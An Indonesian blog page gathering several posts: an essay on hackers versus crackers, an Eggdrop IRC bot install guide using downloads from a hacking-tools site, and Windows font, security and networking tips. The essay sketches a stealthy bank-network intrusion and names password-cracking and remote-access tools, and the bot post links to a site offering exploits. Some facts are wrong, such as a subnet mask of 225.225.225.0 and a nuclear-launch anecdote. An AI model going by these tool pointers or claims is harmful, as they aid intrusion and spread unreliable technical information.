Di Indonesia, aktifitas hacker muncul bersamaan dengan tertangkapnya Wenas (16), bocah belia asal Malang yang melakukan pembobolan sebuah server di Singapura. Ia ditangkap oleh polisi setempat dan baru tanggal 28 Agustus 2000 yang lalu Wenas di jatuhi hukuman denda Rp 150 Juta oleh pengadilan negeri Singapura.

Melihat tingkah polah tokoh kita yang tenar dengan istilah hacker ini seakan dunia sedang dilanda ketakutan besar - besaran, khususnya di dunia perbankan dan jaringan (internet). Apalagi pernah menjadi seorang bocah yang nyaris meluncurkan nuklir - nuklir AS karena kebetulan ketika mainn game di Internet kode - kode game yang ia gunakan mirip dengan kode - kode nuklir tersebut. Tidak bisa dibayangkan bagaimana jika nuklir itu betul - betul meluncur....!!!!

Disamping aktifitas hacker mengancam kehidupan fisik seperti nuklir tadi, ia juga meresahkan seluruh penjuru jaringan, baik personal maupun institusi. Paling terasa dari ancaman itu adalah dunia commerce (perdagangan).

Hacker dan Cracker

Sebelum melangkah jauh menuju aktifitas kejahatan Net (jaringan), perlu anda ketahui terlebih dahulu, apa itu Hacker dan apa juga makhluk yang disebut Cracker itu.

Sementara itu banyak orang yang menganggap Hacker dan Cracker itu sama. Hal ini terjadi lantaran memang di beberapa sisi, Hacker dan Cracker memiliki kesamaan, misalnya, keduanya sama - sama programmer, aktifitasnya membobol/melakukan penyusupan - penyusupan ke jaringan orang melalui Internet, dan keduanya juga saling merahasiakan identitas, dan lain - lain.

Namun sebenarnya, antara Hacker dan Cracker adalah dua makhluk yang berlawanan. Ibaratnya, seorang Hacker adalah pahlawan, sedang Cracker menunjukkan sosok ala penjahat. Menurut I Made Wiryana pakar TI Gunadarma yang juga kandidat Doktor Universitas Bielefeld Jerman mengungkapkan bahwa yang dimaksud Cracker adalah orang yang memasuki sistem secara tidak sah dan melakukan berbagai aktifitas yang merugikan si empunya jaringan yang disusupi. Sedang Hacker adalah orang suka utak - atik jaringan komputer (internet) untuk mencapai kepuasan, pengetahuan teknik. Misalnya Richard Stallman dan Linus Torvalds itu adalah seorang hacker bukan cracker. Begitu juga Bill Gates -pendiri Microsoft -dulu juga seorang hacker.

Akan tetapi memang, tidak semua orang yang beroperasi masuk ke dalam sistem jaringan atau komputer dapat dicap sebagai Cracker. Sebab, hacker pun bekerja seperti itu, tetapi yang membedakan adalah tujuannya. Aktifitas hacker menurut I Made Wiryana bertujuan untuk pencapaian pengetahuan teknis. Hacker bekerja ala Robin Hood, yaitu masuk untuk mencari kelemahan sekuriti dan memperbaikinya, atau paling tidak menunjukkan kepada pemiliknya tentang kelemahan yang harus segera diperbaiki, sebagaimana dijelaskan panjang lebar oleh Stever Levy dalam bukunya tentang hacker.

Sebab tujuan yang berbeda itulah, maka karakter perilakunya pun berbeda, ungkap I Made. Hacker telah memiliki kode etik yang mereka pegang dengan teguh. Hacker sejati akan selalu bertindak berlandaskan kode etik yang walau tidak tertulis tetapi begitu dijunjung tinggi. Salah satu kelompok hacker yang masih memegang teguh etika ini adalah Computer Chaos Clup (CCC) yang didirikan sejak tahun 1980-an di Jerman. Mereka di kenal cukup ketat memegang etika hacker.

Rata - rata perusahaan bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya jelas, yakni menjaga jaringan dari kemungkinan perusakan pihak luar "cracker", disamping itu juga berperan menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak - abrik jaringannya, sebagaimana perusahaan asuransi dan auditing "Price Waterhouse". Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.

Dengan definisi hacker yang begitu terpuji inilah ia layak mendapat pahlawan jaringan, sedang cracker sebagaimana yang telah digambarkan, ia melakukan pembobolan - pembobolan jaringan, mencuri data, menyalahgunakan identitas orang lain, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain. Maka, pantas bila cracker mendapat gelar penjahat jaringan.

Akan tetapi, sebagaimana telah dijelaskan, secara umum keahlian keduanya seimbang. Yang membedakan adalah perilaku dan kode etik yang dipegang. Oleh sebab itulah, maka bisa jadi seseorang disebut hacker ketika ia berlagak ala "Robin Hood", akan tetapi dalam kesempatan lain ia melakukan tindakan di luar etika hacker dan merugikan orang lain, maka ia bukan lagi seorang hacker tapi cracker. Dan orang seperti ini banyak di Indonesia, oleh sebab itulah orang kemudian rancu dalam mendefinisikan keduanya, hingga mengganggap keduanya sama.

Menurut seorang yang notabene aktif dalam dunia perhacker-an Bandung mengatakan bahwa hacker adalah satu diantara kehidupan dunia hitam, orang merahasiakan identitas hacker lantaran tidak mungkin menjadi seorang hacker sebelum menggeluti dunia cracker.

Secara fisik, hacker/cracker rata - rata memiliki bodi kurus ceking bak morfinis, matanya cekung ke dalam dan perokok berat. Para hacker dan cracker juga memiliki pengetahuan dan ketelatenan yang lebih dari rata - rata di bidang pemrograman, artinya ia juga seorang programmer. Keahlian di bidang pemrograman ini kebanyakan di dapat secara otodidak, program yang dipelajari pun bukan program pasaran, yakni program yang di download dari Internet. Sekedar referensi, Anda bisa buka situs http://www.astalavista.box.sk. Web ini menawarkan berbagai program hack dan crack yang lumayan komplit.

Bagi pemula menurutnya, seorang hacker sering menggunakan program BO2K, yakni program pembuka password jaringan yang didownload di situs tersebut, meskipun program ini cukup ringan, akan tetapi masih diperhitungkan orang sebagai program yang membahayakan.

Program lainnya adalah "Cain", yakni program pembobol password dan banyak lagi lainnya. Program - program tersebut memiliki listing dan karakter yang tidak terdapat di buku - buku pasaran, tentu untuk menguasainya seorang hacker harus memiliki keuletan yang luar biasa, dan memang begitu kemampuan hacker di pupuk. Mereka mampu bertahan tidak tidur berhari - hari hanya untuk memecahkan atau menyelesaikan programnya, terutama program - program pembobol. Dan bila mentok, mereka akan menghubungi kawan - kawan hacker lain yang dianggap lebih mumpuni melalui IRC atau email.

Bagi hacker/cracker senior, membuat program dan saling tukar-menukar adalah yang biasa mereka lakukan. Tidak jarang mereka saling menguji programnya melalui jarak jauh (jaringan) antar warnet, karena untuk yang satu ini biasanya terjadi antar warnet.

Semua aktifitas komunikasi dunia hacker dilakukan melalui email dan IRC (chatting room). Bila anda membuka #chatroom di IRC, coba masuki channel #Hackerlink, #AntiHackerlink atau #Validator. Di sana anda akan menyaksikan tingkah polah dan teriakan yang sulit di fahami oleh orang yang memang tidak dong di bidang ini. Banyak pesan di blok warna hitam, kuning, hijau atau merah yang bertuliskan peringatan agar sesama hacker menggunakan nickname asli.

Komunikasi antar hacker di IRC tersebut tidak tersekat dalam batas negara atau wilayah tertentu. Hacker dari mana pun tumplek blek di channel tersebut, meski terdapat banyak lagi channel tempat mereka mangkal, tapi di Indonesia, singgahnya yang terkenal ya....di tiga channel itu. Seringnya antar hacker tidak mau tau dimana mereka berada dan dari negara mana dia. Kesamaan hobi dan keahlian ini agaknya telah membentuk kultur dan komunitas sendiri bagi mereka.

Aktifitas cracker yang membobol bank - bank merupakan kejadian yang wajar terjadi dalam dunia hacker. Sistem jaringan Bank, adalah wadah yang cukup menantang bagi seorang hacker untuk menguji kemampuannya. Biasanya Bank itu menempatkan tiga lapisan sekuriti dalam jaringan dan data basenya. Masing - masing sekuriti memiliki tingkatan lagi keamanan yang super ketat.

Benteng pertama adalah pusat, yakni tempat dimana semua data Bank dan proses sirkulasi uang berjalan. Di server ini sekuriti yang dipasang biasanya dilengkapi dengan alarm yang otomatis berbunyi jika ada satu password saja terbongkar tidak melalui jalan yang sebenarnya.

Kedua adalah benteng Operator (benteng terluar) tempat sekuriti dan petugas yang mempublikasikan kepada peng-acces data dan bagian mana yang bisa di akses dan mana yang ditutupi.

Sedang yang ketiga adalah benteng tengah yang menghubungkan antara operator dengan benteng pusat. Benteng tengah ini selain menghubungkan ke server pusat, juga menghubungkan ke server skunder, yakni tempat penyimpanan cadangan yang siap memback up server pusat apa bila tiba - tiba terjadi kerusakan. Jadi ketika server pusat tiba - tiba rusak, secara otomatis benteng tengah mengalirkan pusat operasi perbankannya ke server skunder (back up) tersebut.

Alur ini harus dipahami oleh seorang hacker, dan seorang hacker juga harus paham bahwa setiap tingkat/benteng tersebut terdapat banyak sekuriti (pintu keamanan) tapi terkunci, nah dari sinilah ibaratnya maling, membongkar lubang rumah yang mana yang paling aman agar tidak diketahui oleh pemilik rumah. Yakni membobol satu atau dua password yang paling aman agar tidak diketahui oleh operator, setelah pintu pertama dapat disusupi, seorang hacker menuju ke benteng tengah, yakni benteng penghubung antar operator dan server pusat. Sebagaimana benteng pertama, benteng ini juga dilengkapi dengan sekuriti yang tidak sedikit, oleh sebab itu seorang hacker juga harus pandai memilah pintu mana yang bila dibobol tidak terdengar oleh pemiliknya. Dan setelah pintu ini berhasil dibuka, seorang hacker tinggal menyelesaikan tugas akhirnya, yakni memasuki benteng pusat. Seperti yang telah digambarkan, benteng ini berisi server letak data dan sirkulasi perbankan disimpan. Tentu sekuriti yang dipasang juga lebih kuat dan kokoh, tidak banyak hacker yang mampu melintasi pintu ini, sebab aksesoris keamanan dilengkapi banyak jebakan dan alarm.

Hacker kebanyakan gagal melintasi pintu ini, bila gagal, ia tidak berhenti sampai di situ, seorang hacker akan memperbaiki programnya atau meminta bantuan kawan hacker lainnya guna menyelesaikan kasus tersebut sampai benar - benar mampu membongkar jantung Bank tersebut.

Akan tetapi bila berhasil, banyak hal yang dapat hacker lakukan, yang sering dilakukan adalah mengakses data - data milik Bank tersebut kemudian disalahgunakan atau di jual pada para carder. Bila tega, mereka tidak segan - segan mengubah data dalam server dan bahkan menghapusnya.

Motif seorang hacker tidak lain hanyalah demi uang atau mencari keuntungan. Meski tidak semuanya salah, akan tetapi bisa dipastikan orang Indonesia yang utak - utik dunia per-hacker-an kepentingannya tidak jauh dari mencuri (berbuat curang). Seperti yang telah digambarkan, bahwa sesungguhnya hacker itu bergerak bak pahlawan "Robin Hood", lantas apa benar ada sosok hacker yang betul - betul berperan sebagaimana idealnya pahlawan tersebut ?

Satu tahun terakhir ini domain Indonesia mendapatkan tamu yang membobol beberapa erver domain yang menggunakan nama Stollen. Memang Stollen menunjukkan sebagaimana hacker yang dipahami sebenarnya. Artinya, ia mengaku tidak memiliki kepentingan apapun terhadap situs (domain) yang ia bajak, ia hanya ingin menunjukkan bahwa terdapat beberapa hole dalam prosedur pendaftaran domain yang dilakukan oleh NetSol. Lebih dari itu, ternyata Stollen juga menemukan bahwa beberapa admin domain (Indonesia) tidak memiliki cukup pengetahuan untuk melindungi domain - domain mereka. Terbukti, dari 15 domain (Indonesia) yang dibajak Stollen, tidak satupun pemiliknya mencoba segera mengambil kembali domain tersebut. Respon tercepat yang didapatkan adalah setelah 2 hari. Bayangkan, 2 hari sesudah pembajakan !! Akan tetapi, dibiarkan pemiliknya mengambil kembali. Seperti yang telah diungkapkan sebelumnya, Stollen tidak memiliki kepentingan tersembunyi apapun. Jika pemiliknya dapat mengambil kembali, silahkan saja. Jika mereka mampu. By the way, salah satu pemilik domain, kalau tidak salah plasa.com yang pemiliknya menggunakan email dns@commerce.net.id, sebenarnya "meminta dengan amat sangat" kepada Stollen untuk mengembalikan domain mereka....

Stollen juga mengatakan bahwa semua ini dilakukan sekaligus memberi peringatan kepada admin (Indonesia) agar tidak menyepelekan persoalan sekuriti (keamanan) dalam menjaga domain mereka, dan kini beberapa admin sudah menempatkan path-nya dengan baik.

Profil Stollen yang ia mainkan tersebut memang pantas apabila dianggap sebagai hacker, sebab ia tidak melakukan pengrusakan - pengrusakan, akan tetapi ia menunjukkan kepada pemilik domain (admin) bahwa mereka lupa memperhatikan sekuriti server mereka. Stollen juga menunjukkan adanya beberapa hole pada prosedur pendaftaran NetSol, berarti semua ini bukan kesalahan InterNIC. Sedang contoh cracker yang digambarkan penjahat bisa anda saksikan seperti Kevin Mitnic dan Wenas.

Sampai kapankah pertempuran peran Hacker dan Cracker ini akan berlangsung. Apakah menunggu hadirnya pahlawan baru, yakni UU Cyber Crime (cyber law) dengan Cyber Police sebagai penegaknya dan mungkin Cyber Jail tempat hukumannya. Atau ini akan berjalan seiring zaman dan kesadaran manusia secara alamiah....we can only "Wait and See"

Klik disini untuk melanjutkan »»

Instalasi Bot

.
0 komentar

Di sini saya akan memperkenalkan tentang bot dan lama hal ini yang berhubungan dengan eggdrop , pasti deh anda sudah mengenal dengan bot atau Eggdrop dan malahan sudah ada yang bosen dengan bot atau eggdrop .Sebelum kita berbicara mengenai bot, Saya akan menjelaskan apa itu Bot atau Eggdrop.


Eggdrop is an IRC bot, written in C. If you don't know what IRC is, this is probably not whatever you're looking for. Eggdrop, being a bot, sits on a channel and takes protective measures: to keep the channel from being taken over (in the few ways that anything can), to recognize banished users or sites and reject them, to recognize privileged users and let them gain ops, etc.
One of the more unique features of Eggdrop is its "party line", accessible via DCC chat and telnet, which allows you to talk to other people lag-free. Consider it a multi-way DCC chat, or a miniature IRC (complete with channels). You can link up with other bots and expand the party line until it actually becomes something very much like IRC, in fact.
Eggdrop is always being improved and adjusted because there are bugs to be fixed and features to be added (if the users demand them, and they make actually sense). In fact, it existed for several years as v0.7 - v0.9 before finally going 1.0. This version of Eggdrop is part of the 1.6 tree. A valiant effort has been made to chase down and destroy bugs.


Setelah kita mengetahui apa itu enggdrop, saya akan memberikan cara termudah untuk menginstall eggdrop tersebut, Dan eggdrop ada beberapa macamnya, ada yang di install pada shell linux/unix , windows dan Juga Dalam bentuh bahasa PHP / PHP bot. dan di sini saya hanya mengajarkan / memberitahu cara penginstalan Bot melalui shell dan Juga dalam Webserver (yang berkaitan dengan PHP Bot )

Cara pengistalan Bot melaui shell unix/linux .

•Download bot tersebut http://geocities.com/medan_hack1/tools/bot/bot.tar.gz

•tar -zxvf /bot.tar.gz

•cd .bot ;./config a.txt ( config file ) nick ident IP chanel owner

contoh : ./config a.txt hacker hacker 192.1.54.25 gnome-x NEO_DOANK

•setelah itu ketik ./ss untuk mendapatkan file egg

•dan jangan Lupa tekan ctrl + c ( ^c ) untuk menghentikan proses jika eror

•setelah terdapat file egg ketik ./egg -m a.txt

•Lihat pada Channel anda ( Pada server dalnet )

Saya Juga memeiliki file-file TCL Keren Abiss deh yang sudah di Masukkan satu paket pada file Yang telah anda download tadi di http://geocities.com/medan_hack1/tools/bot/bot.tar.gz ., di mana file-file TCL itu Hasil modifikasi atau Buatan saya sendiri ? , Jika anda Tidak Puas dengan File yang telah terdapat pada bot.tar.gz maka anda Bisa Mendownload File – file TCl yang keren ABiss deh cotoh nya file

Antidcc.tcl yang berfungsi sebagai pengaman anda dari Gangguan orang yang meremot Bot anda,
cewe.tcl (khusus cewe ) dan di kombinasikan dengan file chat.tcl ( khusus Laki-Laki ) di mana bot akan berkomunikasi / berbicara tentang cinta antara satu dengan Yang lain,
scan.tcl adalah file tcl yang akan melakukan scanning terhadap proxy dan Juga Virus User yang akan masuk ke dalam Channel anda,
bw.tcl adalah file yang dapat melihat trafik banwith service internet anda,
Bot yang ter pasang File ircorp.tcl tersebut akan menyampaikan kepada Master / admin bot tersebut adanya IRCCORP yang masuk ke dalam channel anda. Dan masih banyak Lagi TCL yang keren-keren Abiss, contohnya bot yang dapat menjawab perkataan orang dan lain-lain !!!! .Download di http://geocities.com/medan_hack1/tools/bot/neo.tcl.tar.gz .
Cara penginstalan TCL tersebut :

•Download terlebih dahulu di http://geocities.com/medan_hack1/tools/bot/neo.tcl.tar.gz , dan jangan Pindah ke direktori .bot/scripts/ tetapi anda tetapi saja berada di directory .bot

•Setelah itu itu tar file tersebut neo.tcl.tar.gz

•Gzip file . decompress.gz dan setup.gz setelah terdapat file decompress.gz dan setup

•Ketik ./setup dan tunggu beberapasaat dan akan muncul pesan SUCCSESS
Nb : anda harus mempunyai file a.txt b.txt dan c.txt karena file setup akan langsung menambahkan file .tcl kedalam file a.txt b.txt dan c.txt tersebut.


PHP Bot .

PHP bot serupa dengan eggdrop perbedaannya eggdrop di install pada shell Linux/unix sedangkan PHP bot Hanya dapat di install pada pHP yang berjalan pada webserver, dan Persyaratan Menginstall PHP bot ini adalah anda harus mempunyai website ( banyak tuh free Hosting Yang bisa PHP contoh: Lycos.co.uk dan Masih banyak Lagi) Adapun cara-cara penginstalan adalah SBB :


•Download file tersebut di http://geocities.com/medan_hack1/bot/deombot.zip

•Unzip file tersebut dan editlah file-file *.php ( Khusus semua file PHP ) Yang harus anda ganti Nick, ident, server, port, channel, owner , pass

•Setelah itu upload pada website anda dan setelah itu Buka browser anda dan Browsinglah ke http://domain-anda.com/bot-anda.php

Have Fun !!!!!

Ok deh sekian dulu Semua Cerita panjang Saya Ini Semoga anda tidak bosan-bosan terhadap saya :D

Jagan Lupa Neh Kunjungi http://geocities.com/medan_hack1/tools <========= untuk mendownload semua tools yang Lo idam-idamkan mulai dari exploit, Bot ... etc :D
Dan tidak ketinggalan http://k4hmi.tk

Klik disini untuk melanjutkan »»

Install font dengan lebih cepat

.
0 komentar

Untuk menginstall font biasanya kita harus mengikuti langkah yang panjang : Start > Settings > Control Panel > Font. Lalu dari situ Anda harus klik File > Install New Fonts. Cara tersebut tentunya sangat menjengkelkan. Sebenarnya ada cara yang lebih mudah, yaitu :

Cara pertama :

1. Buka registry editor.
2. Pindah ke key "HKEY_CLASSES_ROOT\TTFFILE\SHELL".
3. Pilihlah perintah "Edit > New > Key" dan berikanlah nama "Install Fonts" pada key yang baru diletakkan tadi.
4. Klik ganda pada bagian jendela kanan pada entry "(Default)".
5. Berikan nilai "Value"-nya "Install Font" dan konfirmasikan perubahan ini dengan mengklik "OK".
6. Tandai sekali lagi subkey "Install Font" dan di dalamnya dengan menggunakan perintah "Edit > New > Key".
7. Buatlah sebuah subkey baru yang dinamakan "command".
8. Klik ganda pada "(Default)", berikan pada "Value"-nya perintah "c:\windows\command\xcopy32.exe %1 c:\windows\fonts".

Sekarang jika Anda mengklik kanan pada file *.ttf akan muncul menu Install Fonts. Jika anda memilih menu ini, maka file font tersebut akan di-copy ke dalam folder Windows anda.

Cara kedua :

1. Buat shortcut yang menunjuk ke directory font pada Windows Anda (C:\Windows\Fonts).
2. Letakkan shortcut tersebut pada directory Send To.

Sekarang untuk menginstall font, klik kanan pada file *.ttf, pilih Send To > Fonts.

Klik disini untuk melanjutkan »»

Kiat Sederhana Meningkatkan Security di Sistem Windows

.
0 komentar

by Chandraleka
Chandrk@hotmail.com
http://www.geocities.com/hchandraleka



Security merupakan hal yang amat penting dalam bekerja dengan komputer. Security yang
handal menyebabkan bekerja dengan PC menjadi aman dan nyaman. Kita akan terlepas dari perasaan
was - was akan hilang atau berubahnya data tanpa sepengetahuan kita. Kita juga tidak ingin isi
komputer kita diintai atau diacak - acak oleh pihak lain. Kita ingin data dan komputer kita
terlindungi dengan baik. Pendek kata privacy terjaga.
Dalam artikel ini penulis akan menjelaskan tentang cara meningkatkan sekuriti pada sistem
operasi Windows, utamanya Windows 9x. Meskipun pada dasarnya Windows mempunyai banyak celah
untuk bisa ditembus, namun setidaknya kita berusaha untuk menutup celah - celah yang ada agar
bisa memfilter user - user yang menggunakan PC kita. Setidaknya user - user yang belum paham
cara menembusnya tidak dapat masuk ke komputer kita.

1. Password BIOS.
BIOS merupakan singkatan dari Basic Input Output System, suatu memori yang berisi setting -
setting seperti waktu, tanggal, tipe harddisk, disk drive, urutan booting, virus protection,
kontrol waktu DRAM, setting IRQ, dll. Ada tipe - tipe BIOS yang dapat diset passwordnya
sehingga apabila komputer kita booting, maka sebelum komputer mengakses harddisk atau disket,
BIOS akan menanyakan passwordnya terlebih dahulu. Untuk memasang passwordnya, pembaca harus
masuk ke BIOS Setup dengan menekan tombol 'Delete' pada keyboard pada awal waktu komputer
booting. Setelah masuk, sorot kata Password dan isikan passwordnya.
Ini merupakan proteksi yang handal karena BIOS tidak akan meneruskan proses booting - yaitu
mengakses disket atau harddisk - sebelum user menuliskan passwordnya dengan benar.

2. Membuat Program Untuk Disisipkan Di Boot Record Hard Disk.
Pembaca dapat juga membuat program - program password yang sederhana untuk kemudian disisipkan
di boot record harddisk. Kenapa di boot recordnya ? Karena bagian harddisk yang mula - mula
diakses adalah boot record. Bahasa pemrograman yang baik untuk membuat program semacam ini
adalah bahasa Assembly.

3. Booting Ke Modus Dos.
Lebih baiknya komputer diset untuk booting ke Dos prompt. Caranya dengan memodifikasi file
msDos.sys yang ada di direktori c:\. Pembaca dapat membuka file tersebut dengan menggunakan
Notepad. Kemudian ganti nilai bootgui = 0. Jangan diubah bagian yang lainnya, kemudian
langsung disimpan.
Booting ke Dos ini dimaksudkan untuk menjaga agar komputer tidak mengeksekusi program -
program yang berpotensi merusak saat memasuki modus Windows sehingga kita dapat melihat
program - program yang akan dijalankan oleh Windows. Coba pembaca berpindah ke direktori
C:\Windows\Start Menu\Programs\StartUp. File - File yang ada di direktori ini secara otomatis
akan dieksekusi / dijalankan oleh Windows pada saat komputer booting dan masuk ke modus
Windows. Dapat dibayangkan semisal di direktori ini terdapat program atau shortcut yang
me-link ke screen saver yang mengandung password yang tidak kita ketahui passwordnya, karena
mungkin dibuat oleh seseorang yang usil dengan komputer kita. Untuk itulah sebaiknya dihapus
saja program - program yang ada di direktori ini terlebih yang tidak kita ketahui asal -
usulnya.

4. Menginstall Program Enkripsi.
Untuk keamanan komputer pada tingkat file, pembaca dapat menginstall program - program enkripsi
data. Program - program enkripsi data semacam ini telah banyak beredar dimana - mana dan
prinsip kerjanya juga kurang lebih sama, yaitu user memilih file yang akan dienkripsi kemudian
menulis passwordnya dan terakhir menyimpan file tersebut. Untuk membukanya user akan dimintai
password terlebih dahulu. Bagi pembaca yang ingin mencoba menggunakan program enkripsi buatan
lokal dapat mendownload program CaroX 2000 Bharathayudha version yang memuat fitur untuk
enkripsi file. Meski lokal, tetapi cukup memadai untuk mengenkripsi data kita. Program tersebut
dapat diperoleh di situs DigitalWorks di http://come.to/digitalworks.

5. Buat Folder Tersembunyi Dengan Kode ASCII
Saran selanjutnya yaitu dengan menyimpan file - file yang bertipe rahasia ke suatu folder /
direktori yang dibuat dengan kode - kode ASCII. Kiat ini masih jarang digunakan namun cukup
handal. Alasannya karena kode ASCII sendiri berjumlah ratusan dan sulit untuk menghapal
semuanya. Alasan kedua; ada sebagian kode ASCII yang bila digunakan untuk membuat direktori /
folder, maka direktori tersebut tidak dapat diakses lewat Windows Explorer, ia hanya nampak
sebagai sebuah folder tanpa nama dengan garis bawah. Sehingga operasi file dari dan ke
direktori tersebut hanya bisa diakses lewat modus Dos dan untuk berganti ke direktori yang
dibuat dengan kode ASCII tersebut harus mengetikkan kombinasi kode ASCII-nya dengan pas.
Sehingga dapat berfungsi semacam password.
Untuk membuat folder semacam ini caranya seperti diterangkan dalam contoh berikut :
· Booting ke modus Dos atau dari Windows panggil program Ms Dos prompt
· Aktifkan tombol Num Lock pada keyboard
· Ketikkan perintah berikut secara berurut pada Dos prompt c:\ :
Md
(spasi)
ALT + 456
(lepas tombol ALT)
ALT + 741
(lepas tombol ALT)
baru
(tekan tombol Enter)

Untuk perintah ALT + 456 maksudnya tekan tombol keyboard ALT dan jangan dilepas, kemudian
tekan tombol keypad (dikanan keyboard) secara berurut : 4, 5, 6. Untuk lebih jelasnya lihat
gambar 1.
· Hasilnya adalah sebuah direktori dengan nama yang terdiri dari 6 karakter. Direktori
ini dapat dilihat dengan Windows Explorer, tetapi tidak dapat diakses. Pembaca dapat
bereksperimen dan berkreasi dengan kode ASCII yang lain. Operasi file baik copy, move,
delete, dll, dilakukan lewat modus Dos.


Gambar 1.
Membuat folder dengan kode ASCII


6. Menyimpan Dokumen Dengan Password To Open atau To Modify
Simpan file dokumen yang kita buat dengan menggunakan password. Program Microsoft Word dan
Excel telah menyertakan fasilitas ini. Password to open maksudnya program akan meminta kita
mengisikan password sebelum dokumen dibuka, bila password salah, maka dokumen tidak akan
dibuka. Password to modify maksudnya dokumen dapat dibuka tanpa password, tetapi untuk mengubah
isi dokumen tidak diperbolehkan kecuali setelah mengisikan password dengan benar. Pada
Microsoft Word dan Excel 2000 password to open dan to modify dapat dipasang pada saat kita akan
menyimpan dokumen. Yaitu dengan memilih menu File | Save As. Kemudian pada kotak dialog
Save As klik tombol Tools | General Options. Pembaca tinggal mengisikan passwordnya. Untuk
sekuriti yang baik isilah password to open dan to modify sekaligus dan aktifkan juga pilihan
Read-only Recommended.


Gambar 2.
Kotak dialog untuk mengisi password


7. Menghapus File Dengan Aman
Kita mungkin terbiasa dengan menghapus file dengan cara - cara yang telah umum. Seperti
menekan tombol keyboard 'del' atau 'Shift' + 'del' atau dengan mengklik kanan mouse kemudian
memilih delete. Dengan cara tersebut memang dapat 'menghapus' file, tetapi perlu pembaca
ketahui bahwa telah banyak program yang dapat 'membangkitkan' file yang telah dihapus dengan
fasilitas Undelete. Contohnya seperti Norton Unerase. Dapat dibayangkan bila file - file
perusahaan yang rahasia yang tidak terpakai lagi yang kita tahu telah kita 'hapus' dan
ternyata file tersebut dapat di-undelete oleh saingan perusahaan tersebut. Berarti perusahaan
lawan tersebut telah mendapat data yang amat berharga.
Untuk itulah penulis sarankan agar pembaca menginstall program yang dapat menghapus file dengan
sebenar - benarnya. Atau bila ingin yang mudah, kita cukup membuka dokumen tersebut - misalnya
dokumen Word, kemudian pilih Select All dan hapus dokumen tersebut. Setelah itu simpan dengan
nama yang sama atau dengan memilih menu Save (bukan Save As). Dalam hal ini berarti pembaca
telah menyimpan suatu dokumen yang kosong. Akhirnya hapus file tersebut. Bila ternyata file
yang telah dihapus itu dapat dibangkitkan dengan Undelete, maka dia akan mendapati dokumen yang
telah kosong. Praktis dan aman.

8. Memblok Pengaksesan Registry Windows.
Hal yang tidak kalah pentingnya adalah memproteksi pengaksesan registry. Tujuannya adalah untuk
menghindari modifikasi registry dari tangan - tangan jahil. Sebagaimana kita ketahui bahwa
setting - setting program yang ada di Windows terletak di registry. Boleh dikatakan bahwa
registry adalah 'nyawa' dari Windows itu sendiri. Bila registry rusak, maka Windows tidak akan
berjalan secara normal.
Ikuti cara berikut untuk memblok registry Windows :
· Buka registry dengan Regedit dengan cara mengklik Start | Run. Ketik 'regedit' pada
kotak dialog dan klik tombol Ok.
· Buka key berikut : Hkey_Current_User\Software\Microsoft\Windows\
CurrentVersion\Policies\System
· Pilih menu : Edit | New | DWORD Value
· Beri nama dengan 'DisableRegistryTools', kemudian beri nilai '1'.
Sekarang tidak ada lagi yang dapat bermain - main dengan registry, karena registry telah
diproteksi.

Demikianlah beberapa saran - saran yang dapat pembaca praktekkan untuk meningkatkan sekuritas
komputer di Windows 9x. Meskipun semua ini bukan suatu pengamanan yang sempurna, setidaknya
kita telah berusaha untuk 'merepotkan' orang - orang yang akan menjebol sistem kita. Siapa
tahu mereka urung meneruskan niat jeleknya.

Klik disini untuk melanjutkan »»

konfigurasi jaringan berbasis windows 2000

.
0 komentar

Ini artikel pertama saya dan mungkin kurang berkualitas.Mudah2an bisa di trima.Mengkonfigurasikan jaringan dalam komputer klien adalah langkah sebelum mulai menggunakan jaringan.Dalam konfigurasi komputer klien,ada dua hal yang harus diperhatikan.

pertama penentuan jenis protokol yang akan di pasang di setiap komputer lalu langkah kedua adalah instalasi protokol dan konfigurasi alamat setiap komputer.Langkah ke tiga adalah mengconfigurasikan geteway atau proxy server dalam aplikasi internet.Langkah ini perlu dilakukan apabila klien boleh mengakses internet.

Penentuan protokol jaringan

Sebelum menginstall protokol jaringan perlu di ketahwi bahwa dalam komunikasi jariang LAN berbasis sistem Windows (win9x,NT,2000,XP) biasanya dipakai protokol NetBEUI.Ini merupakan penyempurnaan dari protokol NETBIOS yang dipakai oleh sistem operasi jaringan.Protokol ini bersifat non-routable ,artinya tidak dapat menghubungkan komputer dalam segmen jaringan yang berbeda.

Protokol NetBEUI akan di Install secara default saat men-konfigurasikan jaringan dalam Windows.Namun jika ingin mengkoneksikan jaringan klien jaringan ke Internet tidak menggunakan NetBEUI namun menggunakan protokol TCP/IP.Selain di gunakan mengkoneksikan jaringan ke internet TCP/IP juga bisa digunakan untuk LAN.Khusus untuk keperluan LAN tersedia sekelompok IP yang telah di sediakan ,yakni kelompok 10.x.x.x,172.16.x.x serta 192.168.x.x.Huruf "x" dalam setiap kelompok alamat diganti dng angka yang bernilai antara 1 sampai 254.

Instalasi Protokol Jaringan

1.Klik kanan icon Network neighborhood(win 9.x) atau my network place (win 2000) pada desktop.Setelah itu pilih properties.

2.Akan muncul windows network dan Dial UP conection.Pilih properties pada jaringan anda.

3.Pilih pilihan Internet protokol TCP/IP,Lalu klik properties.(Jika ada dua pilihan TCP/IP,pilih yang menuju kartu jaringan.)Setelah itu pilih tab general pilih pilihan use the following IP Address.Tidak boleh 2 atau lebih komputer menggunakan alamat IP yang sama.Bisa menggunakan alamat 192.168.0.3 ,192.168.0.4 dan seterusnya.sebaliknya masukkan nilai sama pada subnet mask untuk setiap komputer.Jadi komputer server,komputer klien pertama,kedua dan ketiga menggunakan subnet mask yang sama,misalnya 225.225.225.0

4.Setelah tombol OK,Anda akan kembali ke jendela configurasi Local Area Network conection properties.Klik pilih file dan printer sharing.Jika belum ada pilihan tersebut maka haru di-Intall terlebih dahulu.

5.Mengisikan Identification bagi komputer kita.klik kanan pada icon my network place lalu pilih properties.Pada menu toolbar,pilih network identification.

6.Pada jendela network identification ,klik pilih properties.lalu isikan nama komputer yang di inginkan.Pada bagian workgroup,isikan nama workgroup yang di inginkan.Nama komputer harus berbeda namun nama workgroup haruslah sama.Setelah itu OK.

7.Windows akan secara otomatis akan meng-install file-file yang akan di perlukan.setelah itu mungkin proses restart akan dilakukan.Ulangi langkah-langkah ini setiap komputer yang yang akan dihubungkan ke LAN.
Setelah komputer di restart ,maka akan muncul jendela yang akan meminta anda login.masukkan user dan password seperti yang anda telah lakukan atur sebelumnya.Pada windows 2000 system akan secara otomatis mendetec seluruh jariang komputer yang telah di buat sebelumnya.

